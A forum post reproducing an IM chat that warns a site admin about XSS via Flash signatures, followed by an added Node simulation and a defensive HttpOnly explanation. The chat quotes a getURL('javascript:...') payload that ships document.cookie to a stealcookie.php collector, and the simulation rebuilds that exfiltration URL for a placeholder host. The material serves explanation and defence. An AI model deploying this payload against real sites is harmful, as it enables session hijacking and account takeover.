Gfxwhore told me how *someone* got into Lunatic's Account

[color=#a82f2f]Revengist:[/color] Hi. Are you there?
[color=#16569e]kirupacom <AUTO-REPLY> : [/color][font=tahoma]Hey Revengist,
I’ll brb in a short bit :D[/font]
[color=#a82f2f]Revengist:[/color] Important!
[color=#a82f2f]Revengist:[/color] When you get back please notify me - there's something very vulnerable on your site
[color=#a82f2f]Revengist:[/color] I'll BRB
[color=#16569e]kirupacom:[/color] [font=tahoma]hey[/font]
[color=#16569e]kirupacom:[/color] [font=tahoma]what’s up?[/font]
[color=#a82f2f]Revengist:[/color] Heya sir
[color=#a82f2f]Revengist:[/color] Caught me right before I was about to get a drink :)
[color=#a82f2f]Revengist:[/color] There’s something very important that you have to fix
[color=#16569e]kirupacom:[/color] [font=tahoma]I’m good at doing that![/font]
[color=#a82f2f]Revengist:[/color] I just signed up at your site yesterday
[color=#a82f2f]Revengist:[/color] and I was surprised that you allowed HTML code - but it seems you removed that
[color=#16569e]kirupacom:[/color] [font=tahoma]gfxwhore? :)[/font]
[color=#a82f2f]Revengist:[/color] Yes
[color=#a82f2f]Revengist:[/color] But
[color=#a82f2f]Revengist:[/color] You still allow SWFS
[color=#a82f2f]Revengist:[/color] Flash is a dangeR!
[color=#a82f2f]Revengist:[/color] Don’t you know about XSS?
[color=#a82f2f]Revengist:[/color] OK - let me explain it then
[color=#a82f2f]Revengist:[/color] Basically you have your cookies stored in your browser
[color=#a82f2f]Revengist:[/color] and anyone could make a flash applet that does
[color=#a82f2f]Revengist:[/color] getURL('javascript: location.href="script.com/stealcookie.php?cookie=" + document.cookie');
[color=#a82f2f]Revengist:[/color] then they can use your cookie
[color=#a82f2f]Revengist:[/color] to log in and do stuff - it's very bad
[color=#a82f2f]Revengist:[/color] remove SWF immediately
[color=#16569e]kirupacom:[/color] [font=tahoma]ah - that would explain how someone gained access to a mod’s account yesterday ;)[/font]
[color=#a82f2f]Revengist:[/color] yeh they could do anything man
[color=#a82f2f]Revengist:[/color] you gotta remove it
[color=#a82f2f]Revengist:[/color] never let anyone put swf or html code on your site
[color=#16569e]kirupacom:[/color] [font=tahoma]they linked to pimpsofpain.com as a javascript redirect too, but that's ok; deleting over 15k threads is what bugs most of the mods more[/font]
[color=#a82f2f]Revengist:[/color] hmm, I told the owner of pop dub about the exploit on AIM
[color=#a82f2f]Revengist:[/color] but i dont think he would do something like that
[color=#a82f2f]Revengist:[/color] i’m going to get a glass of water and ill brb
[color=#a82f2f]Revengist:[/color] i gotta try to hook up my other com
[color=#16569e]kirupacom:[/color] [font=tahoma]cya![/font]
[font=Tahoma]So that’s why most forums don’t allow SWF in sigs. Should I go ahead and disable SWFs?[/font]
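The cookie theft Revengist describes, as an added example that is not part of the original thread or of the forum's own code: a Node simulation of what the `getURL('javascript:...')` payload collects from `document.cookie`, what the attacker's collector script sees, and what the HttpOnly cookie flag changes. Cookie names and values are constructed, and the collector URL `http://script.example/stealcookie.php` is a placeholder for the `script.com/stealcookie.php` in the chat.

```javascript
// Added example, not code from the original thread or the forum software: a Node
// simulation of the Flash -> javascript: cookie theft described above, plus the
// HttpOnly flag that keeps session cookies out of document.cookie.
// Cookie names/values are made up; the collector URL is a placeholder.

// Constructed cookie jar: what the forum has set in the victim's browser.
const victimJar = [
  { name: 'bbsessionhash', value: 'a1b2c3d4e5', httpOnly: false },
  { name: 'bbuserid',      value: '4242',       httpOnly: false },
  { name: 'theme',         value: 'dark',       httpOnly: false },
];

// Same jar after the server started setting the session cookies with HttpOnly.
const hardenedJar = victimJar.map(c =>
  ({ ...c, httpOnly: c.name === 'bbsessionhash' || c.name === 'bbuserid' }));

// Model of the browser's document.cookie: HttpOnly cookies are never exposed to script.
function documentCookie(jar) {
  return jar.filter(c => !c.httpOnly).map(c => `${c.name}=${c.value}`).join('; ');
}

// The payload from the chat, once getURL('javascript:...') runs in the page's origin:
// build the URL that ships document.cookie to the attacker's collector.
function buildExfilUrl(collector, cookieString) {
  return `${collector}?cookie=${encodeURIComponent(cookieString)}`;
}

// What the attacker's stealcookie.php sees: the query parameter parsed back into cookies.
function parseStolen(exfilUrl) {
  const raw = new URL(exfilUrl).searchParams.get('cookie') || '';
  const out = {};
  for (const kv of raw.split('; ')) {
    if (!kv) continue;
    const i = kv.indexOf('=');
    out[kv.slice(0, i)] = kv.slice(i + 1);
  }
  return out;
}

// Run the attack against a jar and return the cookie names the attacker obtained.
function stolenCookieNames(jar) {
  const url = buildExfilUrl('http://script.example/stealcookie.php', documentCookie(jar));
  return Object.keys(parseStolen(url));
}

// Defender side: the Set-Cookie header the forum should emit for a session cookie.
function sessionSetCookie(name, value, { secure = false, path = '/' } = {}) {
  const parts = [`${name}=${value}`, `Path=${path}`, 'HttpOnly'];
  if (secure) parts.push('Secure');
  return parts.join('; ');
}

// Stand-alone demo.
console.log('stolen before HttpOnly:', stolenCookieNames(victimJar));
console.log('stolen after  HttpOnly:', stolenCookieNames(hardenedJar));
console.log(sessionSetCookie('bbsessionhash', 'a1b2c3d4e5', { secure: true }));
```

HttpOnly only removes the session cookie from what script can read; the injected JavaScript still runs in the forum's origin as the logged-in mod, so it can still drive the site (deleting threads, for instance) without ever seeing the cookie. That is why the answer to the post's question is to stop accepting user-supplied SWF and HTML altogether, not just to flag the cookies.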